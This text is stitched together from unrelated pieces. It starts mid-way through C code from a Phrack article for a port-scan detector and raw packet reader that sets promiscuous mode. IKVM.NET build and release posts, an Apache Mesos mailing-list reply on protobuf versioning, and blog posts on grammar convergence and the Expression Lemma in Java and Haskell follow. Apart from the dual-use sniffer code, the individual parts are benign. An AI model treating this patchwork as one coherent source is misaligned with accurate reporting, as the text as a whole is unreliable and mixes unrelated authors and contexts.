syslog(LOG_ALERT, buf); } } for(pi = Gsi->udpin; pi; pi = pi->next) { for(al = udplist; al; al = al->next) { if(pi->saddr == al->saddr) { al->cnt++; break; } } if(al == NULL) /* new address */ { al = (struct addrlist *)malloc(sizeof(struct addrlist)); if(al == NULL) { perror("Malloc address list"); exit(-1); } memset(al, 0, sizeof(struct addrlist)); al->saddr = pi->saddr; al->cnt = 1; al->next = udplist; udplist = al; } } for(al = udplist; al; al = al->next) { if(al->cnt > Gportlimit) { sprintf(buf, "Possible UDP port scan from %s (%d ports) against %s\n", anetaddr(al->saddr), al->cnt, abuf); syslog(LOG_ALERT, buf); } } } while(tcplist) { al = tcplist->next; free(tcplist); tcplist = al; } while(udplist) { al = udplist->next; free(udplist); udplist = al; } } 
/************************************************************************ Function: anetaddr Description: Another version of the intoa function. ************************************************************************/ char *anetaddr(addr) u_long addr; { u_long naddr; static char buf[16]; u_char b[4]; int i; naddr = ntohl(addr); for(i = 3; i >= 0; i--) { b[i] = (u_char) (naddr & 0xff); naddr >>= 8; } sprintf(buf, "%d.%d.%d.%d", b[0], b[1], b[2], b[3]); return(buf); } /************************************************************************ Function: initdevice Description: Set up the network device so we can read it. **************************************************************************/ initdevice(fd_flags, dflags) int fd_flags; u_long dflags; { struct ifreq ifr; int fd, flags = 0; if((fd = socket(PF_INET, SOCK_PACKET, htons(0x0003))) < 0) { perror("Cannot open device socket"); exit(-1); } /* Get the existing interface flags */ strcpy(ifr.ifr_name, Gdevice); if(ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) { perror("Cannot get interface flags"); exit(-1); } ifr.ifr_flags |= IFF_PROMISC; if(ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) { perror("Cannot set interface flags"); exit(-1); } return(fd); } /************************************************************************ Function: readdevice Description: Read a packet from the device. **************************************************************************/ u_char *readdevice(fd, pktlen) int fd; int *pktlen; { int cc = 0, from_len, readmore = 1; struct sockaddr from; static u_char pktbuffer[PKTLEN]; u_char *cp; while(readmore) { from_len = sizeof(from); if((cc = recvfrom(fd, pktbuffer, PKTLEN, 0, &from, &from_len)) < 0) { if(errno != EWOULDBLOCK) return(NULL); } if(strcmp(Gdevice, from.sa_data) == 0) readmore = 0; } *pktlen = cc; return(pktbuffer); } /************************************************************************* Function: ether_ntoa Description: Translates a MAC address into ascii. 
This function emulates the ether_ntoa function that exists on Sun and
Solaris, but not on Linux. It could probably (almost certainly) be more
efficient, but it will do.
*************************************************************************/
char *ether_ntoa(etheraddr)
u_char etheraddr[ETH_ALEN];
{
	int i, j;
	static char eout[32];

	for(i = 0, j = 0; i < 5; i++)
	{
		eout[j++] = etheraddr[i] >> 4;
		eout[j++] = etheraddr[i] & 0xF;
		eout[j++] = ':';
	}
	eout[j++] = etheraddr[i] >> 4;
	eout[j++] = etheraddr[i] & 0xF;
	eout[j++] = '\0';
	for(i = 0; i < 17; i++)
	{
		if(eout[i] < 10)
			eout[i] += 0x30;
		else if(eout[i] < 16)
			eout[i] += 0x57;
	}
	return(eout);
}
<-->
----[ EOF

Phrack Magazine Volume 8, Issue 53, July 8, 1998, article 15 of 15
https://www.exploit-db.com/papers/42864/
M. David Peterson has created a Linux Virtual Appliance that can be used to build IKVM.NET from source in a Linux environment without requiring a lot of complicated setup.

root
conary update --replace-files group-devel=conary.rpath.com@rpl:1
conary update cli-gac-tag
cvs -z3 -d:pserver:anonymous@ikvm.cvs.sourceforge.net:/cvsroot/ikvm co -P ikvm
cvs -z3 -d:pserver:anonymous@cvs.savannah.gnu.org:/sources/classpath co classpath
ikvm
nant

That's it!

Yesterday Sun announced that they will be releasing their Java platform implementations under the GPL v2 (+ Classpath exception for the J2SE libraries). This is great news for the Java ecosystem and for IKVM.NET as well, of course. A few people have mailed me to ask what this means specifically for IKVM. Here are my current plans (subject to change, as always): When the GPL version of the Java 7 libraries is released, I will start working on integrating them with IKVM. Some parts of the libraries are not owned by Sun, so there will be holes in what they release; hopefully these can be filled soon (for example, by code from GNU Classpath). The Sun libraries obviously use native code to interface with the OS. For IKVM this is not ideal (JNI is slow, and native code is much less secure and robust than managed code), so where feasible I will continue to use my current "native" implementations (e.g. socket and file I/O) based on the .NET Framework.

New snapshot where I've reintroduced netmodule support. I think that was the final issue resulting from the assembly class loader architecture change, but, as always, I welcome feedback. Changes: Source is in cvs. Binaries: ikvmbin-0.31.2475.zip

Yet another new snapshot. Source is in cvs. Binaries: ikvmbin-0.31.2468.zip

Again, a new snapshot. This time with some new magic to make Java boxed primitives integrate a little better with .NET string formatting.
The following code now produces the expected result:

class test {
    public static void main(String[] args) {
        cli.System.Console.WriteLine("Java Magic = {0:X}", 0xCAFEBABE);
        cli.System.Console.WriteLine("Pi is approx. = {0:N2}", Math.PI);
    }
}

To enable this, the Java box classes have to implement IFormattable. I added support to the remapping infrastructure for this:

<class name="java.lang.Double">
  <implements class="cli.System.IFormattable">
    <method name="ToString" sig="(Ljava.lang.String;Lcli.System.IFormatProvider;)Ljava.lang.String;">
      <redirect class="ikvm.internal.Formatter" type="static" name="ToString"
                sig="(Ljava.lang.Double;Ljava.lang.String;Lcli.System.IFormatProvider;)Ljava.lang.String;" />
    </method>
  </implements>
</class>

The ToString helper method is trivial:

public static String ToString(Double d, String format, IFormatProvider provider) {
    return ((IFormattable)CIL.box_double(d.doubleValue())).ToString(format, provider);
}

Note that from the Java side this is mostly invisible (the exception being that you can now cast a java.lang.Double to cli.System.IFormattable, even though the interface is not visible through reflection).

Source is in cvs. Binaries: ikvmbin-0.31.2466.zip

More fixes and nio improvements and a regression fix.
http://weblog.ikvm.net/default.aspx?date=2006-11-28
>How about splitting the unnamed version into explicit v0, v2, and internal?

Currently our internal protobuf and v0 protobuf use the same unnamed version protobuf and live under the same namespace (`package mesos`). If we are going to split v0 and internal, that requires copying all protobuf files under `package mesos` into `package mesos.internal` and changing the whole code base to use the protobuf in `package mesos.internal`. But it is beneficial to do this, so that we could avoid [the hacks][1] that convert from the unversioned protobuf (v0) to the unversioned protobuf (internal).

[1]

On Thu, Oct 13, 2016 at 12.
> > Looking forward to your thoughts and suggestions.
> AlexR
>
> [1]
> [2]
> [3]
>
> 1f292ba20e/docs/versioning.md

--
Best Regards,
Haosdent Huang
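To make the proposed split concrete, here is a hypothetical sketch of the before/after layout. The file paths and the choice of message are only illustrative, not the actual Mesos layout:

```proto
// include/mesos/mesos.proto -- before the split: v0 clients and
// internal code share this one unversioned namespace.
package mesos;

message TaskInfo { /* ... */ }

// ---- separate file ----

// src/internal/mesos.proto -- after the split: internal definitions
// are copied into their own package, and the code base is updated to
// reference mesos.internal throughout.
package mesos.internal;

message TaskInfo { /* ... */ }
```

The cost is the one-time, code-base-wide rename; the benefit is that no conversion shim between "v0 unversioned" and "internal unversioned" messages is needed anymore.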
https://www.mail-archive.com/user@mesos.apache.org/msg08202.html
I am about to finish a short article on SYB in Prolog. Deadline seems to be in 30 hours from now. If anyone has suggestions, I'd appreciate it. Thanks, Ralf

So we are looking forward to 8 "long" tutorials on different parts of the transformation/generation space of software engineering. For example, Bran Selic will stand in for model-based engineering and Jim Cordy will sketch his ultimate TXL cookbook. See the full program below. In addition, we will host a "research 2.0" event with Jean-Marie Favre and his companion Denis Avrilionis of One Tree Technologies as the moderators or speakers. Yet in addition, there are another 6 short tutorials. We are also in the process of putting together a participants' workshop. Combined with the social program, this will be a packed week as in previous years. At this point, we have 80+ registered participants. REGISTRATION DEADLINE: June 7. The Call for Participation follows. Regards,

GTTSE 2009, 06-11 July, 2009, Braga, Portugal
3rd International Summer School on
Generative and Transformational Techniques in Software Engineering

REGISTRATION DEADLINE: June 7

SCOPE AND FORMAT
The summer school brings together PhD students, lecturers, technology presenters, as well as other researchers and practitioners who are interested in the generation and the transformation of programs, data, models, meta-models, and documentation. This concerns many areas of software engineering: software reverse and re-engineering, model-driven approaches, automated software engineering, generic language technology, to name a few. The tutorials are given by renowned representatives of complementary approaches and problem domains. Each tutorial combines foundations, methods, examples, and tool support.
The program of the summer school also features invited technology presentations, which present setups for generative and transformational techniques. These presentations complement each other in terms of the chosen application domains, case studies, and the underlying concepts. The program of the school also features a participants workshop. All summer school material will be collected in proceedings that are handed out to the participants. Formal proceedings will be compiled after the summer school, where all contributions are subjected to additional reviewing. The formal proceedings of the previous two instances of the summer school (2005 and 2007) were published as volumes 4143 and 5235 in the Lecture Notes in Computer Science series.

RESEARCH 2.0 EVENT
 * Research 2.0 and Software Engineering 2.0
   Jean-Marie Favre and Denis Avrilionis
   OneTree Technologies SA, Luxembourg and University of Grenoble, France

SHORT TUTORIALS
 * The 'Archæology' of Transformations
   Michel Wermelinger and

ORGANIZATION

ADDITIONAL INFORMATION
For additional information on the registration, program, venue, and other details of the summer school, please consult the web page: There is also a contact email address: gttse09 AT list.uni MINUS koblenz.de.

So here is the long promised paper on the Java case study for grammar convergence. Getting all these huge Java grammars to converge was not easy. We are still learning how to do this properly. We are still working on our transformation language, but we feel the results are good enough to go public now. The magic thing about grammar convergence is that it pushes you to necessarily find all the details of grammar variation. Arguably, grammar convergence should be more automatic. However, by asking you to make the transformation decisions, it helps you to understand the result. From now on, suites of related grammars should have no excuse to be flawed and close-lipped as far as their relationships go. Regards,

PS: Now that I repaired the link I can as well put the abstract here.
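The core idea of grammar convergence, applying named transformation steps to related grammars until they become equal, can be caricatured in a few lines of Haskell. This is only an illustration with invented datatypes and operators; the real system (XBGF and its convergence infrastructure) is far richer:

```haskell
import Data.List (nub, sort)

-- A grammar as productions: nonterminal -> alternatives of symbol sequences.
type Grammar = [(String, [[String]])]

-- One transformation step: rename a nonterminal everywhere it occurs.
renameN :: String -> String -> Grammar -> Grammar
renameN old new g = [ (r n, map (map r) alts) | (n, alts) <- g ]
  where r s = if s == old then new else s

-- Convergence check: grammars are equal modulo ordering and duplicates.
converged :: Grammar -> Grammar -> Bool
converged g1 g2 = norm g1 == norm g2
  where norm = sort . map (\(n, alts) -> (n, sort (nub alts)))

-- Two "related" grammars that differ only in naming conventions.
g1, g2 :: Grammar
g1 = [("expr", [["expr", "+", "expr"], ["int"]])]
g2 = [("Expression", [["Expression", "+", "Expression"], ["int"]])]

main :: IO ()
main = print (converged (renameN "expr" "Expression" g1) g2)  -- True
```

The point of the exercise is exactly the one made above: the transformation steps (here, a single rename) are chosen by a human, and each step documents one concrete way in which the grammars vary.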
Berenike, Bernadette, and Isabelle are all doing great. I tend to put photos of my kids online when they get born, and then never again, which I admit is strange; see here and here. (There are only two links because B&B are twins.) I guess we have just so many photos of them that we don’t know which of them to put online. Also, Berenike and Bernadette are turning 9 next year, and they start to get embarrassed by their parents’ actions. Shooting and publishing photos may fail to see their approval. I missed the short window of doing so. Isabelle who turns 3 next year is a fast learner and great imitator; she is even less permissive than her big sisters. Speaking of Isabelle and “approval”, I have uploaded a new paper (draft) to my website. It uses Isabelle/HOL to develop a sort of metatheory for traversal strategies. It is my first project on theorem proving. (I am sane enough not to count type-class-based programming in Haskell as theorem proving.) (Also, don’t get confused with the URL’s ending, “isabelle2”. There is really just one Isabelle/HOL paper so far. The URL helps me to avoid confusion with my youngest daughter’s photo directory, even though it is on a different host.) This is joint work with Markus Kaiser, a Mathematician, who has worked on theorem proving for some time (mostly in the context of cryptology) before he joined the SLE team in Koblenz. This paper has just been submitted. Hence feedback, if any, is appreciated, and will be considered. The actual code distribution is still a bit of a mess, as of writing, but it will be fine, if the paper’s web site says so – soon, hopefully. Title: A Formal Model of Traversal Strategies Authors: Markus Kaiser and Ralf Lämmel URL: Abstract: There is an observable increase in interest in traversal expressiveness in programming: there are new rewriting languages, programming-language extensions, and combinator libraries that enable programmers to design and deploy traversals over structured data. 
Such traversal programs can go wrong in new ways. For instance, a traversal may suddenly fail or diverge. It is important to gain better understanding of properties of traversal programs so that programmers make more knowledgeable choices of traversal schemes, and programming environments may provide improved documentation, targeted checks, and other support. This paper presents a machine-checked, Isabelle/HOL-based, formal model of traversal strategies. Amongst others, the model provides sufficient conditions for traversal programs not to fail and not to diverge. The model with its mechanized proofs makes systematic use of Isabelle/HOL's various capabilities for dealing with recursion or induction. I have been somewhat silent for all kinds of boring reasons, but also quite so because I am terribly slow in grasping even basic category theory. (You don’t need to have any such knowledge to enjoy this post – just a bit of time because I guess this is going to be the longest blog post ever.) Still all the categorical pain was worth it, and here is why … The Expression Lemma captures a fundamental correspondence between Functional and OO Programming. In this blog post, let me try to explain the lemma in an easygoing manner. I will cut off all mentioning of the Expression Problem which constitutes arguably a motivation for this research. Let me focus on a very obvious and compelling motivation: the lemma provides a foundation for refactoring OO programs of a certain scheme to functional programs of a certain, associated scheme (and vice versa; in case, the latter is really found useful and not considered a criminal offense). BTW, the proof of the lemma will not be discussed below. Also, I should emphasize that only the simple expression lemma will be covered here. So let me refer to the paper for all such elaborations. 
Before I get started I want to acknowledge that I report about joint work with Ondrej Rypacek who is currently presenting our results at the Mathematics of Program Construction conference in Marseille. In fact, Ondrej deserves most if not all credit. Ondrej also blogged about the lemma some time back, and LTU had linked to the post.

Consider a recursive data structure; let's use the abstract syntax of a tiny expression language in the running example. For simplicity, let's limit ourselves to two expression forms: numeric literals, and binary expressions for addition. Consider some recursive operations that are defined on the data structure. Let's use "expression evaluation" and some sort of "expression transformation" in the running example. In Java, we can use an abstract class, Expr, to model the data structure with abstract methods, eval and modn, to model the operations. (We could also use interface polymorphism.)

public abstract class Expr {
    public abstract int eval();        // Evaluate expressions
    public abstract void modn(int n);  // Transform modulo a constant
}

The two expression forms give rise to two subclasses that encapsulate data and operations.

public class Num extends Expr {
    private int value;                             // State
    public Num(int value) { this.value = value; }  // Constructor
    public int eval() { return value; }
    public void modn(int n) { this.value = this.value % n; }
}

public class Add extends Expr {
    private Expr left, right;            // State
    public Add(Expr left, Expr right) {  // Constructor
        this.left = left;
        this.right = right;
    }
    public int eval() { return left.eval() + right.eval(); }
    public void modn(int n) { left.modn(n); right.modn(n); }
}
In Haskell: -- Expression forms data Expr = Num Int | Add Expr Expr -- Evaluate expressions eval :: Expr -> Int eval (Num i) = i eval (Add l r) = eval l + eval r -- Transform all literals modulo a constant modn :: Expr -> Int -> Expr modn (Num i) n = Num (i `mod` n) modn (Add l r) n = Add (modn l n) (modn r n) Now the 1 Million $ question is this: Are the two shown programs semantically equivalent, and, if so, how could one possibly prove the equivalence? The expression lemma will arise as an important tool in establishing that semantic equivalence. It is desirable to know of such equivalence because, for example, it would formally justify a refactoring from the OO style of decomposition to the functional one, and vice versa. Some might say that the semantic equivalence is reasonably obvious, but then again, how to formally establish this fact? Also, we are presumably looking for a general class of equivalent program couples (rather than the specific exemplars at hand), but at this stage, it is not obvious how this class would be characterized. After 2-3 semesters of computer science, you may launch the following attempt. Suppose: · j refers to the above Java program · h refers to the above Haskell program · [| . |]Java assigns semantic meanings to (the relevant subset of) Java · [| . |]Haskell assigns semantic meanings to (the relevant subset of) Haskell Then our educated but inexperienced CS student could hope to be able to show that: [| j |]Java ≡ [|h |]Haskell. Or perhaps I just skipped too many classes and had too much wine over the years, and this could work. Anyway, I reckon that this approach would require “semantic voodoo” because the established semantic domains for the two abstraction mechanisms (i.e., classes vs. recursive functions on algebraic data types) are so radically different. In fact, the above equivalence claim does not make much sense, in its current form, because the I/O behaviors do not even match at the type level. 
The functions of h take term-like data via an argument, while the objects of j readily encapsulate data (state) on which to invoke methods. We can match up the input type by building the objects of the OO program from the same representation that is fed into the functions. That is, expression objects would be constructed from expression terms. Let’s call this step recursive object construction, and designate a static method fromData in the class Expr. Now, if we assume that Java’s and Haskell’s integers can be compared, a “well-typed” proposition about the semantic equivalence of the eval method vs. the eval function can be stated as follows: For all expression terms t: Expr.fromData(t).eval() = eval t (Java goes left, Haskell goes right.) We cannot cover modn in this manner, as will be clear shortly. That is, the function modn returns public data – expression terms, while the method modn returns opaque data – expression objects. So how can we possibly compare the results returned by the function and the method? An apparently symmetric choice would be to introduce the presumable “inverse” of fromData; say an instance method toData which, in the case of Expr, extracts expression terms from expression objects. In fact, some of you may notice that such a couple fromData/toData would be possibly related to what’s called (de-) serialization in distributed programming or object persistency. So let’s try to match up the output type of methods and functions as follows: once a method has been performed such that a new object is returned (or an existing object is mutated), we would extract the state by serialization, hoping to use the data types of the functional program again for the representation of the externalized state, so that comparisons between functional and OO world make sense. If this all works, a “well-typed” proposition about the semantic equivalence of the modn method vs. the modn function could be stated as follows. 
(For simplicity of chaining, we assume that modn returns the result of the transformation; hence, it is no longer a void method – something that is, btw, for deep reasons, even more evil for a Smalltalk programmer than for a Haskell programmer.)

For all expression terms t, for all n: Expr.fromData(t).modn(n).toData() = modn t n

(Again, Java goes left, Haskell goes right.) Let’s scrutinize this use of de-/serialization. Here we note that serialization is “normally” meant to externalize an object’s state for the sake of being able to rematerialize (de-serialize) the object later or elsewhere. Not every object is serializable (in the wild). When an object ends up being serializable, then the serialization format is still effectively private to the corresponding object type, perhaps even to a specific implementation of the type – ask your local OO expert. Do we really want to define semantic equivalence with reference to serialization (or reflection and RTTI), i.e., systematically look into the objects at hand, and patently break encapsulation? I contend that semantic equivalence should instead be defined with reference to object interfaces and behavior (rather than “core dumps” extracted from the objects). So let’s try to limit the statement of equivalence to “observations” that are readily admitted by the OO interface. When these observations return “pure data”, e.g., integers, we can easily compare the results from the functional and OO world. For instance, the semantic equivalence of the modn function vs. the modn method could be approximated by using eval to perform observations. Thus:

For all integers n, for all expression terms t: Expr.fromData(t).modn(n).eval() = eval (modn t n)

This option is at peace with encapsulation, and is therefore to be favored. However, the generality of the option is still to be established.
In particular, we need to find a way to universally quantify over all possible observations, and to compare the observations with the results from the functional world. To be continued. At this point, we are still struggling with two different host languages in our equations (cf. “Java goes left, Haskell goes right”). A formal model is in closer reach if we first eliminate one language. It’s hard to be fair every day. Let’s say goodbye to the OO language; let’s encode OO programs functionally (aka non-dysfunctionally), i.e., by using a functional object encoding. Not much is changed though: the encoding preserves the decomposition style of the OO program, and the use of objects including encapsulation. We use Haskell to encode the encoding. There are the following steps:

1. Declare an interface functor: this is a type constructor that defines the product of all method signatures for the interface of interest in terms of the state type of an object. The state type is abstracted as a type parameter; see x below. In the running example, the eval method returns an Int; the modn method takes an Int and returns a transformed copy of “self” (aka “this”). Thus:

type IExprF x = (Int, Int -> x)

2. Declare the type of opaque objects: we take the recursive closure of the interface functor. In this manner, the state type is effectively hidden from the observable interface. For convenience’s sake, we also define projections that allow us to invoke the different methods on a capsule. Thus:

newtype IExpr = InIExpr { outIExpr :: IExprF IExpr }

callEval = fst . outIExpr
callModn = snd . outIExpr

3. Declare the type of interface implementations: this is just a trivial application of the interface functor. The idea is that an interface implementation observes the state and populates the type for the method signatures as prescribed by the interface functor.
In the co-algebraic discipline of functional object encoding, the resulting type is called the co-algebra type for the functor at hand. Thus:

type IExprCoAlg x = x -> IExprF x

4. Provide interface implementations: remember, the Java blueprint contains one concrete class for numeric literals, and another concrete class for binary expressions for addition. In the former case, the state type is Int; in the latter case, the state type is a pair of IExpr objects. These are the corresponding interface implementations:

numCoAlg :: IExprCoAlg Int
numCoAlg = numEval /\ numModn
  where
    numEval = id
    numModn = mod

… or in non-pointfree style:

numCoAlg i = (numEval, numModn)
  where
    numEval = i
    numModn n = i `mod` n

addCoAlg :: IExprCoAlg (IExpr, IExpr)
addCoAlg = addEval /\ addModn
  where
    addEval = uncurry (+) . (callEval <*> callEval)
    addModn = uncurry (/\) . (callModn <*> callModn)

… or in non-pointfree style:

addCoAlg (l, r) = (addEval, addModn)
  where
    addEval = callEval l + callEval r
    addModn n = (callModn l n, callModn r n)

(Here, “/\” denotes the split combinator, (f /\ g) x = (f x, g x), and “<*>” the product map, (f <*> g) (x, y) = (f x, g y).)

5. Provide object constructors: the Java blueprint had constructors. More generally, any class needs a protocol for populating object state. In a functional object encoding, a constructor can be modeled as a function that takes the initial state of an object, and encapsulates it with the method implementations. To this end, the fundamental operation of unfolding comes to the rescue; unfold “builds” (or “constructs”) values of a functor’s recursive closure (here: IExpr) from values of some other type (here: integers or subobjects):

newNum :: Int -> IExpr
newNum = unfoldIExpr numCoAlg

newAdd :: (IExpr, IExpr) -> IExpr
newAdd = unfoldIExpr addCoAlg

Conceptually, the unfold operation is defined generically for any functor: (i) apply the argument – a co-algebra (cf. c below), (ii) map the unfold operation recursively over the positions of the functor’s type parameter (here: the occurrence of self’s type in the arguments and results of methods, cf.
fmapIExprF below), (iii) tie the recursive knot of the functor (cf. InIExpr below). Thus:

unfoldIExpr :: IExprCoAlg x -> x -> IExpr
unfoldIExpr c = InIExpr . fmapIExprF (unfoldIExpr c) . c

The definition of the functorial map is induced by the structure of the functor at hand. The IExprF functor comprises one occurrence of the type parameter, namely in the second component of the pair, specifically in the result-type position of the function type (i.e., in the return type of the signature of the modn method). The argument of the functorial map is applied to that occurrence:

fmapIExprF :: (x -> y) -> IExprF x -> IExprF y
fmapIExprF f (e, m) = (e, f . m)

This completes our transcription of the Java code to Haskell. As a simple illustration and clarification of the development so far, let us do some expression evaluation in different settings. In the OO setting, we construct objects by nested object construction, on which we invoke the method for expression evaluation. Thus:

public class Demo {
    public static void main(String[] args) {
        Expr x = new Add(
            new Num(39),
            new Add(
                new Num(1),
                new Num(2)));
        System.out.println(x.eval());
    }
}

Likewise, in the setting of the original functional program, we construct a nested term to which we apply the function for expression evaluation. While visually similar, it is important to notice that term construction results in plain, public data, whereas object construction results in objects that encapsulate private data and behavior.

main = do
  let x = Add (Num 39) (Add (Num 1) (Num 2))
  print $ eval x

Here is also a demo for the functionally encoded OO program:

let x = newAdd (newNum 39, newAdd (newNum 1, newNum 2))
print $ callEval x

All programs agree on the result of evaluation: 42. We are now in the position to actually define fromData – as needed for matching up the input types of the two programs.
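As a further sanity check (my addition, not part of the original development), the encoded objects also support chaining a modn call before observing with eval, and the result agrees with the functional program. The sketch below simply collects the step-by-step definitions from above into one self-contained module:

```haskell
-- Functional program (from the beginning of the post)
data Expr = Num Int | Add Expr Expr

eval :: Expr -> Int
eval (Num i) = i
eval (Add l r) = eval l + eval r

modn :: Expr -> Int -> Expr
modn (Num i) n = Num (i `mod` n)
modn (Add l r) n = Add (modn l n) (modn r n)

-- Functional object encoding (steps 1-5, non-pointfree style)
type IExprF x = (Int, Int -> x)

newtype IExpr = InIExpr { outIExpr :: IExprF IExpr }

callEval :: IExpr -> Int
callEval = fst . outIExpr

callModn :: IExpr -> Int -> IExpr
callModn = snd . outIExpr

fmapIExprF :: (x -> y) -> IExprF x -> IExprF y
fmapIExprF f (e, m) = (e, f . m)

type IExprCoAlg x = x -> IExprF x

unfoldIExpr :: IExprCoAlg x -> x -> IExpr
unfoldIExpr c = InIExpr . fmapIExprF (unfoldIExpr c) . c

numCoAlg :: IExprCoAlg Int
numCoAlg i = (i, \n -> i `mod` n)

addCoAlg :: IExprCoAlg (IExpr, IExpr)
addCoAlg (l, r) = (callEval l + callEval r, \n -> (callModn l n, callModn r n))

newNum :: Int -> IExpr
newNum = unfoldIExpr numCoAlg

newAdd :: (IExpr, IExpr) -> IExpr
newAdd = unfoldIExpr addCoAlg

-- Observation chains on both sides: 9 + 1 + 2 = 12 in each case
demoFun, demoOO :: Int
demoFun = eval (modn t 10)
  where t = Add (Num 39) (Add (Num 1) (Num 2))
demoOO = callEval (callModn o 10)
  where o = newAdd (newNum 39, newAdd (newNum 1, newNum 2))
```

Both `demoFun` and `demoOO` yield 12, as they should if the two programs are observationally equivalent.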
Thanks to the functional object encoding, it is now easier to see that it really makes sense to construct expression objects from expression trees. We exploit the fact that the recursive data structure of the functional program coincides with the recursive closure of the union of the OO state types. Here is the type of fromData:

fromData :: Expr -> IExpr

Our development relies on “Squiggol power” and the entire backlog of functorially parameterized morphisms. Hence, we must redefine the recursive data structure as the recursive closure of its non-recursive functorial shape. (Compare this with the non-recursive interface functor and the separate definition of its recursive closure.) Thus:

type ExprF x = Either Int (x, x)

newtype Expr = InExpr { outExpr :: ExprF Expr }

num = InExpr . Left   -- serves as constructor
add = InExpr . Right  -- serves as constructor

The type constructor ExprF captures the functorial shape of the expression forms. That is, it is a sum over Int (corresponding to the case of numeric literals) and (x, x) (corresponding to the case of binary addition), where x is ultimately to be instantiated to the recursive closure of the functor. That closure is taken by Expr. Indeed, the newly defined Expr is isomorphic to the algebraic data type Expr as it was defined earlier. We can now combine the constructors for the two kinds of IExpr objects into a single function that dispatches on the functorial structure; here we apply ExprF to the opaque object type:

newEither :: ExprF IExpr -> IExpr
newEither = newNum \/ newAdd

… or more verbosely, by expansion of “\/”:

newEither :: ExprF IExpr -> IExpr
newEither (Left i)   = newNum i
newEither (Right lr) = newAdd lr

It remains to apply newEither in a recursive manner. The fundamental operation of folding comes to the rescue. A fold traverses a recursive data structure while it is parameterized by a fold algebra, i.e., operations to apply to intermediate results as well as leaves.
The “one-layer” constructor newEither serves as the fold algebra in our case. In other words, recursive object construction is defined as a fold over expression terms, while the constructor newEither dispatches on expression forms and invokes data-variant-specific constructors at each level:

fromData :: Expr -> IExpr
fromData = foldExpr newEither

Conceptually, the fold operation is defined generically for any functor: (i) reveal one layer of functorial shape from the recursive closure (cf. outExpr below); (ii) map the fold operation recursively over the positions of the functor’s type parameter (here: over the positions for subobjects, cf. fmapExprF below); (iii) combine intermediate results (or process leaves) by applying the fold algebra (cf. a below). Thus:

type ExprAlg x = ExprF x -> x

foldExpr :: ExprAlg x -> Expr -> x
foldExpr a = a . fmapExprF (foldExpr a) . outExpr

The functor implies the following functorial map:

fmapExprF :: (x -> y) -> ExprF x -> ExprF y
fmapExprF f (Left i)        = Left i
fmapExprF f (Right (x, x')) = Right (f x, f x')

We are still in need of a general method for comparing the results returned by the functions vs. the methods. We already alluded to the use of observations for that purpose. There is one trick we did not yet mention. That is, we can construct objects (an ADT) from the functional program such that the functional program’s “public” data is encapsulated with the functions to be applied to that data. As a result, we will have objects on both sides of the equation, and hence can perform observations on both sides, which makes it easier to set up a comparison. The ADT is constructed as follows:

newBoth :: Expr -> IExpr
newBoth = unfoldIExpr both

both :: IExprCoAlg Expr
both = eval /\ modn

… or more verbosely, by expansion of “/\”:

both e = (eval e, modn e)

It’s time for a bold claim:

fromData = newBoth

That is, the objects obtained by recursive construction are equivalent to the objects obtained by the ADT construction.
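Before making the claim precise, it can at least be spot-checked on samples (my addition; a test, not a proof). The sketch below bundles the definitions developed so far and compares fromData and newBoth through the observations admitted by the interface:

```haskell
-- Interface functor, opaque objects, unfold (as developed above)
type IExprF x = (Int, Int -> x)
newtype IExpr = InIExpr { outIExpr :: IExprF IExpr }

callEval :: IExpr -> Int
callEval = fst . outIExpr
callModn :: IExpr -> Int -> IExpr
callModn = snd . outIExpr

fmapIExprF :: (x -> y) -> IExprF x -> IExprF y
fmapIExprF f (e, m) = (e, f . m)

unfoldIExpr :: (x -> IExprF x) -> x -> IExpr
unfoldIExpr c = InIExpr . fmapIExprF (unfoldIExpr c) . c

newNum :: Int -> IExpr
newNum = unfoldIExpr (\i -> (i, \n -> i `mod` n))
newAdd :: (IExpr, IExpr) -> IExpr
newAdd = unfoldIExpr (\(l, r) ->
  (callEval l + callEval r, \n -> (callModn l n, callModn r n)))

-- Data functor, its recursive closure, fold (as developed above)
type ExprF x = Either Int (x, x)
newtype Expr = InExpr { outExpr :: ExprF Expr }

num :: Int -> Expr
num = InExpr . Left
add :: (Expr, Expr) -> Expr
add = InExpr . Right

fmapExprF :: (x -> y) -> ExprF x -> ExprF y
fmapExprF _ (Left i)        = Left i
fmapExprF f (Right (x, x')) = Right (f x, f x')

foldExpr :: (ExprF x -> x) -> Expr -> x
foldExpr a = a . fmapExprF (foldExpr a) . outExpr

-- The functions of the functional program, on this Expr
eval :: Expr -> Int
eval = foldExpr (either id (uncurry (+)))
modn :: Expr -> Int -> Expr
modn e n = foldExpr (either (\i -> num (i `mod` n)) add) e

-- The two object constructions to be compared
fromData :: Expr -> IExpr
fromData = foldExpr (either newNum newAdd)
newBoth :: Expr -> IExpr
newBoth = unfoldIExpr (\e -> (eval e, modn e))

-- Compare observation chains on a sample term
sample :: Expr
sample = add (num 39, add (num 1, num 2))

agree :: Bool
agree = callEval (fromData sample) == callEval (newBoth sample)
     && callEval (callModn (fromData sample) 7)
        == callEval (callModn (newBoth sample) 7)
```

Here `agree` evaluates to True: both chains yield 42 for plain evaluation and 7 after modn with 7.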
Let’s clarify the kind of equivalence at hand. Here we note that the terms on both sides of the equation are functions, and the equality sign is meant here as extensional equality, i.e., these functions always return the same result when applied to the same argument. Now, we also need to understand that the functions return objects which are in turn tuples of functions (methods). Further, each such method can be invoked again to return new objects (i.e., yet other tuples of functions). That is, method invocation can be arranged in arbitrarily long chains. Extensional equality of fromData and newBoth implies that all these possible chains also lead to observationally equivalent results. To summarize, the objects constructed by fromData and newBoth are indistinguishable by the observations (including chains of any length) admitted by the interface. This is really as much as we could hope for within the bounds of encapsulation. Hence, from here on, we replace the vague term of semantic equivalence by the more rigorous term of observational equivalence. We are not yet ready for a proof of the above claim. Intuitively, we need to get to a point where we can show that the functional program and the OO program are based on the same problem-specific ingredients (having to do with data variants for expressions and operations thereupon) which are only composed in different manners. At this point, the functional program is particularly monolithic: two functions written in the style of general recursion. Contrast this status with the functional object encoding of the OO program, where the co-algebra identifies all problem-specific ingredients in a structured manner. 
It is easy enough to achieve a similar degree of modularity for the eval and modn functions by defining them in terms of fold; it is “well-known” that these forms can actually be derived automatically:

eval = foldExpr evalAlg

evalAlg = evalNum \/ evalAdd

evalNum :: Int -> Int
evalNum = id

evalAdd :: (Int, Int) -> Int
evalAdd = uncurry (+)

modn = foldExpr modnAlg

modnAlg = modnNum \/ modnAdd

modnNum :: Int -> Int -> Expr
modnNum = (.) num . mod

modnAdd :: (Int -> Expr, Int -> Expr) -> Int -> Expr
modnAdd = (.) add . uncurry (/\)

